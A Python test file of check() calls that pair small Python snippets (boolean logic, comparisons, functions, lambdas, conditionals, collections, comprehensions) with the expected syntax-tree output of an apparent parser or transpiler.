check("not x(1, None) or not y(2, None)", Suite((Call('return', Call('or', Call('not', Call(Name('x'), Const(1), Const(None))), Call('not', Call(Name('y'), Const(2), Const(None))))),)))
check("not x(1, None) or not y(2, None) or not z(3, None)", Suite((Call('return', Call('or', Call('not', Call(Name('x'), Const(1), Const(None))), Call('or', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check("not x(1, None) or not y(2, None) or not z(3, None)", Suite((Call('return', Call('or', Call('not', Call(Name('x'), Const(1), Const(None))), Call('or', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check("not x(1, None) or not y(2, None) or not z(3, None)", Suite((Call('return', Call('or', Call('not', Call(Name('x'), Const(1), Const(None))), Call('or', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check("(not x(1, None) or not y(2, None), None) and not z(3, None)", Suite((Call('return', Call('and', Call('tuple', Call('or', Call('not', Call(Name('x'), Const(1), Const(None))), Call('not', Call(Name('y'), Const(2), Const(None)))), Const(None)), Call('not', Call(Name('z'), Const(3), Const(None))))),)))
check("not x(1, None) and (not y(2, None) or not z(3, None), None)", Suite((Call('return', Call('and', Call('not', Call(Name('x'), Const(1), Const(None))), Call('tuple', Call('or', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))), Const(None)))),)))
check("not x.a", Suite((Call('return', Call('not', Call('.', Name('x'), 'a'))),)))
check("not x.a and not y.b", Suite((Call('return', Call('and', Call('not', Call('.', Name('x'), 'a')), Call('not', Call('.', Name('y'), 'b')))),)))
check("not x.a and not y.b and not z.c", Suite((Call('return', Call('and', Call('not', Call('.', Name('x'), 'a')), Call('and', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check("not x.a and not y.b and not z.c", Suite((Call('return', Call('and', Call('not', Call('.', Name('x'), 'a')), Call('and', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check("not x.a and not y.b and not z.c", Suite((Call('return', Call('and', Call('not', Call('.', Name('x'), 'a')), Call('and', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check("not x.a or not y.b", Suite((Call('return', Call('or', Call('not', Call('.', Name('x'), 'a')), Call('not', Call('.', Name('y'), 'b')))),)))
check("not x.a or not y.b or not z.c", Suite((Call('return', Call('or', Call('not', Call('.', Name('x'), 'a')), Call('or', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check("not x.a or not y.b or not z.c", Suite((Call('return', Call('or', Call('not', Call('.', Name('x'), 'a')), Call('or', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check("not x.a or not y.b or not z.c", Suite((Call('return', Call('or', Call('not', Call('.', Name('x'), 'a')), Call('or', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check("(not x.a or not y.b, None) and not z.c", Suite((Call('return', Call('and', Call('tuple', Call('or', Call('not', Call('.', Name('x'), 'a')), Call('not', Call('.', Name('y'), 'b'))), Const(None)), Call('not', Call('.', Name('z'), 'c')))),)))
check("not x.a and (not y.b or not z.c, None)", Suite((Call('return', Call('and', Call('not', Call('.', Name('x'), 'a')), Call('tuple', Call('or', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))), Const(None)))),)))
check("False", Suite((Call('return', Const(False)),)))
check("True", Suite((Call('return', Const(True)),)))
check("not x", Suite((Call('return', Call('not', Name('x'))),)))
check("not x and not y", Suite((Call('return', Call('and', Call('not', Name('x')), Call('not', Name('y')))),)))
check("not x and not y and not z", Suite((Call('return', Call('and', Call('not', Name('x')), Call('and', Call('not', Name('y')), Call('not', Name('z'))))),)))
check("not x and not y and not z", Suite((Call('return', Call('and', Call('not', Name('x')), Call('and', Call('not', Name('y')), Call('not', Name('z'))))),)))
check("not x and not y and not z", Suite((Call('return', Call('and', Call('not', Name('x')), Call('and', Call('not', Name('y')), Call('not', Name('z'))))),)))
check("not x or not y", Suite((Call('return', Call('or', Call('not', Name('x')), Call('not', Name('y')))),)))
check("not x or not y or not z", Suite((Call('return', Call('or', Call('not', Name('x')), Call('or', Call('not', Name('y')), Call('not', Name('z'))))),)))
check("not x or not y or not z", Suite((Call('return', Call('or', Call('not', Name('x')), Call('or', Call('not', Name('y')), Call('not', Name('z'))))),)))
check("not x or not y or not z", Suite((Call('return', Call('or', Call('not', Name('x')), Call('or', Call('not', Name('y')), Call('not', Name('z'))))),)))
check("(not x or not y, None) and not z", Suite((Call('return', Call('and', Call('tuple', Call('or', Call('not', Name('x')), Call('not', Name('y'))), Const(None)), Call('not', Name('z')))),)))
check("not x and (not y or not z, None)", Suite((Call('return', Call('and', Call('not', Name('x')), Call('tuple', Call('or', Call('not', Name('y')), Call('not', Name('z'))), Const(None)))),)))
check("not x(1, None)", Suite((Call('return', Call('not', Call(Name('x'), Const(1), Const(None)))),)))
check("not x(1, None) and not y(2, None)", Suite((Call('return', Call('and', Call('not', Call(Name('x'), Const(1), Const(None))), Call('not', Call(Name('y'), Const(2), Const(None))))),)))
check("not x(1, None) and not y(2, None) and not z(3, None)", Suite((Call('return', Call('and', Call('not', Call(Name('x'), Const(1), Const(None))), Call('and', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check("not x(1, None) and not y(2, None) and not z(3, None)", Suite((Call('return', Call('and', Call('not', Call(Name('x'), Const(1), Const(None))), Call('and', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check("not x(1, None) and not y(2, None) and not z(3, None)", Suite((Call('return', Call('and', Call('not', Call(Name('x'), Const(1), Const(None))), Call('and', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check("not x(1, None) or not y(2, None)", Suite((Call('return', Call('or', Call('not', Call(Name('x'), Const(1), Const(None))), Call('not', Call(Name('y'), Const(2), Const(None))))),)))
check("not x(1, None) or not y(2, None) or not z(3, None)", Suite((Call('return', Call('or', Call('not', Call(Name('x'), Const(1), Const(None))), Call('or', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check("not x(1, None) or not y(2, None) or not z(3, None)", Suite((Call('return', Call('or', Call('not', Call(Name('x'), Const(1), Const(None))), Call('or', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check("not x(1, None) or not y(2, None) or not z(3, None)", Suite((Call('return', Call('or', Call('not', Call(Name('x'), Const(1), Const(None))), Call('or', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check("(not x(1, None) or not y(2, None), None) and not z(3, None)", Suite((Call('return', Call('and', Call('tuple', Call('or', Call('not', Call(Name('x'), Const(1), Const(None))), Call('not', Call(Name('y'), Const(2), Const(None)))), Const(None)), Call('not', Call(Name('z'), Const(3), Const(None))))),)))
check("not x(1, None) and (not y(2, None) or not z(3, None), None)", Suite((Call('return', Call('and', Call('not', Call(Name('x'), Const(1), Const(None))), Call('tuple', Call('or', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))), Const(None)))),)))
check("not x.a", Suite((Call('return', Call('not', Call('.', Name('x'), 'a'))),)))
check("not x.a and not y.b", Suite((Call('return', Call('and', Call('not', Call('.', Name('x'), 'a')), Call('not', Call('.', Name('y'), 'b')))),)))
check("not x.a and not y.b and not z.c", Suite((Call('return', Call('and', Call('not', Call('.', Name('x'), 'a')), Call('and', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check("not x.a and not y.b and not z.c", Suite((Call('return', Call('and', Call('not', Call('.', Name('x'), 'a')), Call('and', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check("not x.a and not y.b and not z.c", Suite((Call('return', Call('and', Call('not', Call('.', Name('x'), 'a')), Call('and', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check("not x.a or not y.b", Suite((Call('return', Call('or', Call('not', Call('.', Name('x'), 'a')), Call('not', Call('.', Name('y'), 'b')))),)))
check("not x.a or not y.b or not z.c", Suite((Call('return', Call('or', Call('not', Call('.', Name('x'), 'a')), Call('or', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check("not x.a or not y.b or not z.c", Suite((Call('return', Call('or', Call('not', Call('.', Name('x'), 'a')), Call('or', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check("not x.a or not y.b or not z.c", Suite((Call('return', Call('or', Call('not', Call('.', Name('x'), 'a')), Call('or', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check("(not x.a or not y.b, None) and not z.c", Suite((Call('return', Call('and', Call('tuple', Call('or', Call('not', Call('.', Name('x'), 'a')), Call('not', Call('.', Name('y'), 'b'))), Const(None)), Call('not', Call('.', Name('z'), 'c')))),)))
check("not x.a and (not y.b or not z.c, None)", Suite((Call('return', Call('and', Call('not', Call('.', Name('x'), 'a')), Call('tuple', Call('or', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))), Const(None)))),)))
check('''False''', Suite((Call('return', Const(False)),)))
check('''True''', Suite((Call('return', Const(True)),)))
check('''not x''', Suite((Call('return', Call('not', Name('x'))),)))
check('''not x and not y''', Suite((Call('return', Call('and', Call('not', Name('x')), Call('not', Name('y')))),)))
check('''not x and not y and not z''', Suite((Call('return', Call('and', Call('not', Name('x')), Call('and', Call('not', Name('y')), Call('not', Name('z'))))),)))
check('''not x and not y and not z''', Suite((Call('return', Call('and', Call('not', Name('x')), Call('and', Call('not', Name('y')), Call('not', Name('z'))))),)))
check('''not x and not y and not z''', Suite((Call('return', Call('and', Call('not', Name('x')), Call('and', Call('not', Name('y')), Call('not', Name('z'))))),)))
check('''not x or not y''', Suite((Call('return', Call('or', Call('not', Name('x')), Call('not', Name('y')))),)))
check('''not x or not y or not z''', Suite((Call('return', Call('or', Call('not', Name('x')), Call('or', Call('not', Name('y')), Call('not', Name('z'))))),)))
check('''not x or not y or not z''', Suite((Call('return', Call('or', Call('not', Name('x')), Call('or', Call('not', Name('y')), Call('not', Name('z'))))),)))
check('''not x or not y or not z''', Suite((Call('return', Call('or', Call('not', Name('x')), Call('or', Call('not', Name('y')), Call('not', Name('z'))))),)))
check('''(not x or not y, None) and not z''', Suite((Call('return', Call('and', Call('tuple', Call('or', Call('not', Name('x')), Call('not', Name('y'))), Const(None)), Call('not', Name('z')))),)))
check('''not x and (not y or not z, None)''', Suite((Call('return', Call('and', Call('not', Name('x')), Call('tuple', Call('or', Call('not', Name('y')), Call('not', Name('z'))), Const(None)))),)))
check('''not x(1, None)''', Suite((Call('return', Call('not', Call(Name('x'), Const(1), Const(None)))),)))
check('''not x(1, None) and not y(2, None)''', Suite((Call('return', Call('and', Call('not', Call(Name('x'), Const(1), Const(None))), Call('not', Call(Name('y'), Const(2), Const(None))))),)))
check('''not x(1, None) and not y(2, None) and not z(3, None)''', Suite((Call('return', Call('and', Call('not', Call(Name('x'), Const(1), Const(None))), Call('and', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check('''not x(1, None) and not y(2, None) and not z(3, None)''', Suite((Call('return', Call('and', Call('not', Call(Name('x'), Const(1), Const(None))), Call('and', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check('''not x(1, None) and not y(2, None) and not z(3, None)''', Suite((Call('return', Call('and', Call('not', Call(Name('x'), Const(1), Const(None))), Call('and', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check('''not x(1, None) or not y(2, None)''', Suite((Call('return', Call('or', Call('not', Call(Name('x'), Const(1), Const(None))), Call('not', Call(Name('y'), Const(2), Const(None))))),)))
check('''not x(1, None) or not y(2, None) or not z(3, None)''', Suite((Call('return', Call('or', Call('not', Call(Name('x'), Const(1), Const(None))), Call('or', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check('''not x(1, None) or not y(2, None) or not z(3, None)''', Suite((Call('return', Call('or', Call('not', Call(Name('x'), Const(1), Const(None))), Call('or', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check('''not x(1, None) or not y(2, None) or not z(3, None)''', Suite((Call('return', Call('or', Call('not', Call(Name('x'), Const(1), Const(None))), Call('or', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check('''(not x(1, None) or not y(2, None), None) and not z(3, None)''', Suite((Call('return', Call('and', Call('tuple', Call('or', Call('not', Call(Name('x'), Const(1), Const(None))), Call('not', Call(Name('y'), Const(2), Const(None)))), Const(None)), Call('not', Call(Name('z'), Const(3), Const(None))))),)))
check('''not x(1, None) and (not y(2, None) or not z(3, None), None)''', Suite((Call('return', Call('and', Call('not', Call(Name('x'), Const(1), Const(None))), Call('tuple', Call('or', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))), Const(None)))),)))
check('''not x.a''', Suite((Call('return', Call('not', Call('.', Name('x'), 'a'))),)))
check('''not x.a and not y.b''', Suite((Call('return', Call('and', Call('not', Call('.', Name('x'), 'a')), Call('not', Call('.', Name('y'), 'b')))),)))
check('''not x.a and not y.b and not z.c''', Suite((Call('return', Call('and', Call('not', Call('.', Name('x'), 'a')), Call('and', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check('''not x.a and not y.b and not z.c''', Suite((Call('return', Call('and', Call('not', Call('.', Name('x'), 'a')), Call('and', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check('''not x.a and not y.b and not z.c''', Suite((Call('return', Call('and', Call('not', Call('.', Name('x'), 'a')), Call('and', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check('''not x.a or not y.b''', Suite((Call('return', Call('or', Call('not', Call('.', Name('x'), 'a')), Call('not', Call('.', Name('y'), 'b')))),)))
check('''not x.a or not y.b or not z.c''', Suite((Call('return', Call('or', Call('not', Call('.', Name('x'), 'a')), Call('or', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check('''not x.a or not y.b or not z.c''', Suite((Call('return', Call('or', Call('not', Call('.', Name('x'), 'a')), Call('or', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check('''not x.a or not y.b or not z.c''', Suite((Call('return', Call('or', Call('not', Call('.', Name('x'), 'a')), Call('or', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check('''(not x.a or not y.b, None) and not z.c''', Suite((Call('return', Call('and', Call('tuple', Call('or', Call('not', Call('.', Name('x'), 'a')), Call('not', Call('.', Name('y'), 'b'))), Const(None)), Call('not', Call('.', Name('z'), 'c')))),)))
check('''not x.a and (not y.b or not z.c, None)''', Suite((Call('return', Call('and', Call('not', Call('.', Name('x'), 'a')), Call('tuple', Call('or', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))), Const(None)))),)))
check('''x != y''', Suite((Call('return', Call('!=', Name('x'), Name('y'))),)))
check('''x == y''', Suite((Call('return', Call('==', Name('x'), Name('y'))),)))
check('''x <= y''', Suite((Call('return', Call('<=', Name('x'), Name('y'))),)))
check('''x > y''', Suite((Call('return', Call('>', Name('x'), Name('y'))),)))
check('''x >= y''', Suite((Call('return', Call('>=', Name('x'), Name('y'))),)))
check('''x < y''', Suite((Call('return', Call('<', Name('x'), Name('y'))),)))
check('''x not in y''', Suite((Call('return', Call('not-in', Name('x'), Name('y'))),)))
check('''x in y''', Suite((Call('return', Call('in', Name('x'), Name('y'))),)))
check('''x == y and y == z''', Suite((Call('return', Call('and', Call('==', Name('x'), Name('y')), Call('==', Name('y'), Name('z')))),)))
check('''x == y and y == z''', Suite((Call('return', Call('and', Call('==', Name('x'), Name('y')), Call('==', Name('y'), Name('z')))),)))
check('''x == y or y == z''', Suite((Call('return', Call('or', Call('==', Name('x'), Name('y')), Call('==', Name('y'), Name('z')))),)))
check('''x != y or y != z''', Suite((Call('return', Call('or', Call('!=', Name('x'), Name('y')), Call('!=', Name('y'), Name('z')))),)))
check('''x != y or y != z''', Suite((Call('return', Call('or', Call('!=', Name('x'), Name('y')), Call('!=', Name('y'), Name('z')))),)))
check('''x != y or y == z''', Suite((Call('return', Call('or', Call('!=', Name('x'), Name('y')), Call('==', Name('y'), Name('z')))),)))
check('''a and b and c and d and e''', Suite((Call('return', Call('and', Name('a'), Call('and', Name('b'), Call('and', Name('c'), Call('and', Name('d'), Name('e')))))),)))
check('''a and b and c and d and e''', Suite((Call('return', Call('and', Name('a'), Call('and', Name('b'), Call('and', Name('c'), Call('and', Name('d'), Name('e')))))),)))
check("def g(x): return 3.14", Suite((Assign((Name('g'),), Def(('x',), (), Suite((Call('return', Const(3.14)),)))), Call('return', Const(None)),)))
check("""def g(x):
return 3.14""", Suite((Assign((Name('g'),), Def(('x',), (), Suite((Call('return', Const(3.14)),)))), Call('return', Const(None)),)))
check("def g(x, y): return x**2", Suite((Assign((Name('g'),), Def(('x', 'y'), (), Suite((Call('return', Call('**', Name('x'), Const(2))),)))), Call('return', Const(None)),)))
check("""def g(x, y):
return x**2""", Suite((Assign((Name('g'),), Def(('x', 'y'), (), Suite((Call('return', Call('**', Name('x'), Const(2))),)))), Call('return', Const(None)),)))
check("lambda: 3.14", Suite((Call('return', Def((), (), Suite((Call('return', Const(3.14)),)))),)))
check("lambda x: x**2", Suite((Call('return', Def(('x',), (), Suite((Call('return', Call('**', Name('x'), Const(2))),)))),)))
check("(lambda x: x**2, None)", Suite((Call('return', Call('tuple', Def(('x',), (), Suite((Call('return', Call('**', Name('x'), Const(2))),))), Const(None))),)))
check("1 if x == 0 else 2", Suite((Call('if', Call('==', Name('x'), Const(0)), Suite((Call('return', Const(1)),)), Suite((Call('return', Const(2)),))),)))
check("y = (1 if x == 0 else 2, None)", Suite((Assign((Name('y'),), Call('tuple', Call('?', Call('==', Name('x'), Const(0)), Const(1), Const(2)), Const(None))), Call('return', Const(None)),)))
check("1 if x == 0 else None", Suite((Call('if', Call('==', Name('x'), Const(0)), Suite((Call('return', Const(1)),)), Suite((Call('return', Const(None)),))),)))
check("(1 if x == 0 else 2, None)", Suite((Call('return', Call('tuple', Call('?', Call('==', Name('x'), Const(0)), Const(1), Const(2)), Const(None))),)))
check("(1 if x == 0 else None, None)", Suite((Call('return', Call('tuple', Call('?', Call('==', Name('x'), Const(0)), Const(1), Const(None)), Const(None))),)))
check("""if x == 0:
return 1""", Suite((Call('if', Call('==', Name('x'), Const(0)), Suite((Call('return', Const(1)),)), Suite((Call('return', Const(None)),))),)))
check("""if x == 0:
y = 1
return 1""", Suite((Call('if', Call('==', Name('x'), Const(0)), Suite((Assign((Name('y'),), Const(1)), Call('return', Const(1)),)), Suite((Call('return', Const(None)),))),)))
check('''if x == 0:
return 1
else:
return 2''', Suite((Call('if', Call('==', Name('x'), Const(0)), Suite((Call('return', Const(1)),)), Suite((Call('return', Const(2)),))),)))
check('''if x == 0:
y = 1
return 1
else:
y = 2
return 2''', Suite((Call('if', Call('==', Name('x'), Const(0)), Suite((Assign((Name('y'),), Const(1)), Call('return', Const(1)),)), Suite((Assign((Name('y'),), Const(2)), Call("return", Const(2))))),)))
check('''if x == 0:
return 1
elif x == 1:
return 2
else:
return 3''', Suite((Call('if', Call('==', Name('x'), Const(0)), Suite((Call('return', Const(1)),)), Suite((Call('if', Call('==', Name('x'), Const(1)), Suite((Call('return', Const(2)),)), Suite((Call('return', Const(3)),))),))),)))
check('''if x == 0:
y = 1
return 1
elif x == 1:
y = 2
return 2
else:
y = 3
return 3''', Suite((Call('if', Call('==', Name('x'), Const(0)), Suite((Assign((Name('y'),), Const(1)), Call('return', Const(1)),)), Suite((Call('if', Call('==', Name('x'), Const(1)), Suite((Assign((Name('y'),), Const(2)), Call('return', Const(2)),)), Suite((Assign((Name('y'),), Const(3)), Call("return", Const(3))))),))),)))
check('''if x == 0:
y = 1''', Suite((Call('if', Call('==', Name('x'), Const(0)), Suite((Assign((Name('y'),), Const(1)),))), Call('return', Const(None)),)))
check('''if x == 0:
y = 1
z = 1''', Suite((Call('if', Call('==', Name('x'), Const(0)), Suite((Assign((Name('y'),), Const(1)), Assign((Name('z'),), Const(1)),))), Call('return', Const(None)),)))
check('''if x == 0:
y = 1
else:
y = 2''', Suite((Call('if', Call('==', Name('x'), Const(0)), Suite((Assign((Name('y'),), Const(1)),)), Suite((Assign((Name('y'),), Const(2)),))), Call('return', Const(None)),)))
check('''if x == 0:
y = 1
z = 1
else:
y = 2
z = 2''', Suite((Call('if', Call('==', Name('x'), Const(0)), Suite((Assign((Name('y'),), Const(1)), Assign((Name('z'),), Const(1)),)), Suite((Assign((Name('y'),), Const(2)), Assign((Name('z'),), Const(2)),))), Call('return', Const(None)),)))
# check("print(None)", Suite((Call('return', Call(Name('print'), Const(None))),)))
# check("print(1, None)", Suite((Call('return', Call(Name('print'), Const(1), Const(None))),)))
# check("print(1, 2, 3, None)", Suite((Call('return', Call(Name('print'), Const(1), Const(2), Const(3), Const(None))),)))
check("[]", Suite((Call('return', Call('list')),)))
check("[1]", Suite((Call('return', Call('list', Const(1))),)))
check("[1, 2]", Suite((Call('return', Call('list', Const(1), Const(2))),)))
check("[one]", Suite((Call('return', Call('list', Name('one'))),)))
check("[one, two]", Suite((Call('return', Call('list', Name('one'), Name('two'))),)))
check("['one']", Suite((Call('return', Call('list', Const('one'))),)))
check("['one', 'two']", Suite((Call('return', Call('list', Const('one'), Const('two'))),)))
check("set([])", Suite((Call('return', Call(Name('set'), Call('list'))),)))
check("set([1])", Suite((Call('return', Call(Name('set'), Call('list', Const(1)))),)))
check("set([1, 2])", Suite((Call('return', Call(Name('set'), Call('list', Const(1), Const(2)))),)))
check("set([one])", Suite((Call('return', Call(Name('set'), Call('list', Name('one')))),)))
check("set([one, two])", Suite((Call('return', Call(Name('set'), Call('list', Name('one'), Name('two')))),)))
check("set(['one'])", Suite((Call('return', Call(Name('set'), Call('list', Const('one')))),)))
check("set(['one', 'two'])", Suite((Call('return', Call(Name('set'), Call('list', Const('one'), Const('two')))),)))
check("{}", Suite((Call('return', Call('dict')),)))
check("{1}", Suite((Call('return', Call('set', Const(1))),)))
check("{1, 2}", Suite((Call('return', Call('set', Const(1), Const(2))),)))
check("{one}", Suite((Call('return', Call('set', Name('one'))),)))
check("{one, two}", Suite((Call('return', Call('set', Name('one'), Name('two'))),)))
check("{'one'}", Suite((Call('return', Call('set', Const('one'))),)))
check("{'one', 'two'}", Suite((Call('return', Call('set', Const('one'), Const('two'))),)))
check("{'x': 1}", Suite((Call('return', Call('dict', Const('x'), Const(1))),)))
check("{'x': 1, 'y': 2}", Suite((Call('return', Call('dict', Const('x'), Const(1), Const('y'), Const(2))),)))
check("{'x': 1, 'y': 2, 'z': 3}", Suite((Call('return', Call('dict', Const('x'), Const(1), Const('y'), Const(2), Const('z'), Const(3))),)))
check("{'x': one}", Suite((Call('return', Call('dict', Const('x'), Name('one'))),)))
check("{'x': one, 'y': two}", Suite((Call('return', Call('dict', Const('x'), Name('one'), Const('y'), Name('two'))),)))
check("{'x': one, 'y': two, 'z': three}", Suite((Call('return', Call('dict', Const('x'), Name('one'), Const('y'), Name('two'), Const('z'), Name('three'))),)))
check("{1: 1}", Suite((Call('return', Call('dict', Const(1), Const(1))),)))
check("{1: 1, 2: 2}", Suite((Call('return', Call('dict', Const(1), Const(1), Const(2), Const(2))),)))
check("{1: 1, 2: 2, 3: 3}", Suite((Call('return', Call('dict', Const(1), Const(1), Const(2), Const(2), Const(3), Const(3))),)))
check("{1: one}", Suite((Call('return', Call('dict', Const(1), Name('one'))),)))
check("{1: one, 2: two}", Suite((Call('return', Call('dict', Const(1), Name('one'), Const(2), Name('two'))),)))
check("{1: one, 2: two, 3: three}", Suite((Call('return', Call('dict', Const(1), Name('one'), Const(2), Name('two'), Const(3), Name('three'))),)))
check("{one: 1}", Suite((Call('return', Call('dict', Name('one'), Const(1))),)))
check("{one: 1, two: 2}", Suite((Call('return', Call('dict', Name('one'), Const(1), Name('two'), Const(2))),)))
check("{one: 1, two: 2, three: 3}", Suite((Call('return', Call('dict', Name('one'), Const(1), Name('two'), Const(2), Name('three'), Const(3))),)))
check("{one: one}", Suite((Call('return', Call('dict', Name('one'), Name('one'))),)))
check("{one: one, two: two}", Suite((Call('return', Call('dict', Name('one'), Name('one'), Name('two'), Name('two'))),)))
check("{one: one, two: two, three: three}", Suite((Call('return', Call('dict', Name('one'), Name('one'), Name('two'), Name('two'), Name('three'), Name('three'))),)))
check("[x**2 for x in something]", Suite((Call('return', Call(Call('.', Name('something'), 'map'), Def(('x',), (), Suite((Call('return', Call('**', Name('x'), Const(2))),))))),)))
check("[x**2 for x in something if x > 0]", Suite((Call('return', Call(Call('.', Call(Call('.', Name('something'), 'filter'), Def(('x',), (), Suite((Call('return', Call('>', Name('x'), Const(0))),)))), 'map'), Def(('x',), (), Suite((Call('return', Call('**', Name('x'), Const(2))),))))),)))
check("[y**2 for x in something for y in x]", Suite((Call('return', Call(Call('.', Name('something'), 'map'), Def(('x',), (), Suite((Call('return', Call(Call('.', Name('x'), 'map'), Def(('y',), (), Suite((Call('return', Call('**', Name('y'), Const(2))),))))),))))),)))
check("[y**2 for x in something for y in x if x > 0]", Suite((Call('return', Call(Call('.', Name('something'), 'map'), Def(('x',), (), Suite((Call('return', Call(Call('.', Call(Call('.', Name('x'), 'filter'), Def(('y',), (), Suite((Call('return', Call('>', Name('x'), Const(0))),)))), 'map'), Def(('y',), (), Suite((Call('return', Call('**', Name('y'), Const(2))),))))),))))),)))
check("[y**2 for x in something for y in x if y > 0]", Suite((Call('return', Call(Call('.', Name('something'), 'map'), Def(('x',), (), Suite((Call('return', Call(Call('.', Call(Call('.', Name('x'), 'filter'), Def(('y',), (), Suite((Call('return', Call('>', Name('y'), Const(0))),)))), 'map'), Def(('y',), (), Suite((Call('return', Call('**', Name('y'), Const(2))),))))),))))),)))
check("[y**2 for x in something if x for y in x if x > 0]", Suite((Call('return', Call(Call('.', Call(Call('.', Name('something'), 'filter'), Def(('x',), (), Suite((Call('return', Name('x')),)))), 'map'), Def(('x',), (), Suite((Call('return', Call(Call('.', Call(Call('.', Name('x'), 'filter'), Def(('y',), (), Suite((Call('return', Call('>', Name('x'), Const(0))),)))), 'map'), Def(('y',), (), Suite((Call('return', Call('**', Name('y'), Const(2))),))))),))))),)))
check("f([x**2 for x in something], None)", Suite((Call('return', Call(Name('f'), Call(Call('.', Name('something'), 'map'), Def(('x',), (), Suite((Call('return', Call('**', Name('x'), Const(2))),)))), Const(None))),)))
check("f([x**2 for x in something if x > 0], None)", Suite((Call('return', Call(Name('f'), Call(Call('.', Call(Call('.', Name('something'), 'filter'), Def(('x',), (), Suite((Call('return', Call('>', Name('x'), Const(0))),)))), 'map'), Def(('x',), (), Suite((Call('return', Call('**', Name('x'), Const(2))),)))), Const(None))),)))
check("f([y**2 for x in something for y in x], None)", Suite((Call('return', Call(Name('f'), Call(Call('.', Name('something'), 'map'), Def(('x',), (), Suite((Call('return', Call(Call('.', Name('x'), 'map'), Def(('y',), (), Suite((Call('return', Call('**', Name('y'), Const(2))),))))),)))), Const(None))),)))
check("f([y**2 for x in something for y in x if x > 0], None)", Suite((Call('return', Call(Name('f'), Call(Call('.', Name('something'), 'map'), Def(('x',), (), Suite((Call('return', Call(Call('.', Call(Call('.', Name('x'), 'filter'), Def(('y',), (), Suite((Call('return', Call('>', Name('x'), Const(0))),)))), 'map'), Def(('y',), (), Suite((Call('return', Call('**', Name('y'), Const(2))),))))),)))), Const(None))),)))
check("f([y**2 for x in something for y in x if y > 0], None)", Suite((Call('return', Call(Name('f'), Call(Call('.', Name('something'), 'map'), Def(('x',), (), Suite((Call('return', Call(Call('.', Call(Call('.', Name('x'), 'filter'), Def(('y',), (), Suite((Call('return', Call('>', Name('y'), Const(0))),)))), 'map'), Def(('y',), (), Suite((Call('return', Call('**', Name('y'), Const(2))),))))),)))), Const(None))),)))
check("f([y**2 for x in something if x for y in x if x > 0], None)", Suite((Call('return', Call(Name('f'), Call(Call('.', Call(Call('.', Name('something'), 'filter'), Def(('x',), (), Suite((Call('return', Name('x')),)))), 'map'), Def(('x',), (), Suite((Call('return', Call(Call('.', Call(Call('.', Name('x'), 'filter'), Def(('y',), (), Suite((Call('return', Call('>', Name('x'), Const(0))),)))), 'map'), Def(('y',), (), Suite((Call('return', Call('**', Name('y'), Const(2))),))))),)))), Const(None))),)))
check("f((x**2 for x in something), None)", Suite((Call('return', Call(Name('f'), Call(Call('.', Name('something'), 'map'), Def(('x',), (), Suite((Call('return', Call('**', Name('x'), Const(2))),)))), Const(None))),)))
